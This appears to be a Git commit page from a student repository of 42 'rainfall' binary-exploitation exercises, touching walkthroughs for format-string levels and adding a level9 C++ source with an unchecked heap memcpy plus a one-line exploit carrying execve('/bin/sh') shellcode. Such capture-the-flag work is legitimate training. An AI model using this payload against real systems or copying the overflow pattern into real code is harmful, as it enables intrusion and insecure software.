starnakin/42_rainfall
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fix: bunch of meaningless chars in the walkthrough/source code

Browse Source 
level9: done (wip - walkthrough)
This commit is contained in:
0x35c 2025-05-05 18:00:54 +02:00
parent 50afa069df
commit 428102a376
5 changed files with 49 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
level3/walkthrough
View File

@ -1,7 +1,7 @@
# Level3 # Level3
Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`.
This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). This buffer will then be passed directly as a parameter to `printf()`. This allows us to print whatever we want (e.g dump the stack, change variables).
We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/sh")` if `m == 64`. We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/sh")` if `m == 64`.
Our goal here will be to change the value of this variable in order to get the password. Our goal here will be to change the value of this variable in order to get the password.

2
level4/walkthrough
View File

@ -1,6 +1,6 @@
# Level4 # Level4
Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`.
This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables).
We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/cat /home/user/level5/.pass")` if `m == 16930116`. We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/cat /home/user/level5/.pass")` if `m == 16930116`.
Our goal here will be to change the value of this variable in order to get the password. Our goal here will be to change the value of this variable in order to get the password.

2
level7/source.c
View File

@ -9,7 +9,7 @@ void m(void)
{ {
time_t current_time; time_t current_time;
current_time = time((time_t *)0x0); current_time = time(NULL);
printf("%s - %d\n", c, current_time); printf("%s - %d\n", c, current_time);
return; return;
} }

1
level9/ressources/exploit Normal file
View File

@ -0,0 +1 @@
./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')

44
level9/source.cpp Normal file
View File

@ -0,0 +1,44 @@
#include <cstring>
#include <stdlib.h>
class N
{
public:
char annotation[100];
int nb;
N(int Nb)
{
nb = Nb;
}
void setAnnotation(char *str)
{
memcpy(annotation, str, strlen(str));
}
int operator+(N const &e)
{
return nb + e.nb;
}
int operator-(N const &e)
{
return nb - e.nb;
}
};
int main(int ac, char **av)
{
if (ac <= 1)
exit(1);
N *a = new N(5);
N *b = new N(6);
N *a_ptr = a;
N *b_ptr = b;
a_ptr->setAnnotation(av[1]);
return *b_ptr + *a_ptr;
}